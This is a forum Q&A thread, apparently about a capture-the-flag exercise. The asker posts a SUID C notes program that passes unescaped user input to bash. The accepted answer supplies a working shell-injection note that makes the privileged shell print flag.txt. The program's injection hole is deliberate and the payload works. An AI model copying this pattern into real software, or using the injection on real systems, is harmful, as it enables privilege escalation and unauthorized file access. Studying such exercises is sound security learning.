# How to shell command inject a file

Tags: c, linux, shell, inject

I have the following c program which is SUID.

```
int  execute(char *command, char *envp[])
{
     pid_t  pid;
     int    status=0;
     char *argv[] = {"/bin/bash", "-p", "-c", command, NULL};

     if ((pid = fork()) < 0) {     /* fork a child process           */
          printf("*** ERROR: forking child process failed\n");
          exit(1);
     }
     else if (pid == 0) {          /* for the child process:         */
          if (execvpe(*argv, argv, envp) < 0) {     /* execute the command  */
               printf("*** ERROR: exec failed\n");
               exit(1);
          }
     }
     else {                                  /* for the parent:      */
          while (wait(&status) != pid)       /* wait for completion  */
               ;
     }
     return status;
}


int  main(int argc, char * argv[], char *envp[])
{  
     char command[256];
     char name[64];
     char menu[10];
     char notes[128];
     char filename[128] = PREFIX;

     strcat(filename,"mynotes.txt");
     
     printf("What's your name? ");
     fgets(name, 64, stdin);
     strtok(name,"\n");
     printf("Welcome %s!\n", name);
     do {
          printf("\nWhat would you like to do? \n");
          printf("[1] Check the weather\n");
          printf("[2] Write a note\n");
          printf("[3] Read my notes\n");
          printf("[4] Get the flag\n");
          printf("[5] Quit\n");
          printf("Enter your choise (1-5): ");
          fgets(menu,10,stdin);

          switch(menu[0]) {
               case '1': 
                    strcpy(command, "/usr/bin/curl wttr.in/?format=4");
                    execute(command,envp);
                    break;
               case '2':
                    printf("Please type in your notes (128 characters max.):\n");
                    fgets(notes, 128, stdin);
                    sprintf(command, "/bin/echo '%s' >> %s", notes, filename);
                    execute(command,envp);
                    break;
               case '3':
                    sprintf(command,"/bin/cat %s", filename);
                    execute(command,envp);
                    break;
               case '4':
                    printf("I'm sorry %s, I'm afraid I can't do that.\n", name);
                    break;
          }
     }
     while(menu[0] != '5');

     return 0;
}
```

How can I exploit this with a shell command injection to display the contents of another file owned by the same user.
For example, I have tried ./shellwrapper ;cat flag.txt - but the permission is denied as ./shellwrapper has finished and the suid is no longer effective. Is there a vulnerability in the menu selection?

Comment: You need to refine this example into a minimal verifiable example - your question has nothing to do with your notes system, the weather, or any of your menu system.  Show us code that focuses on exactly - and only - what you're trying to do with files you can show here .

Comment: Other commands on the same line are not fed as input to the new shell. Your original shell parses the command line, and executes each of them separately.

Comment: Also, the shell you're running from shellwrapper gets its command from the `-c` option, not from standard input.

Comment: @Barmar Yeah I can see they get executed separately, as the cat flag.txt gets permission denied. Im wondering how I can cat the flag.txt file within the ./shellwrapper since that is the SUID program

Answer (score 0, accepted):

Select option 2, and enter the following note:

```
';cat flag.txt;echo '
```

This works because it doesn't escape the note input, so when you substitute the note you get

```
/bin/echo '';cat flag.txt;echo '' >> mynotes.txt
```

This will be executed by the SUID shell. It will output `flag.txt` to the terminal, and write a blank line into `mynotes.txt`.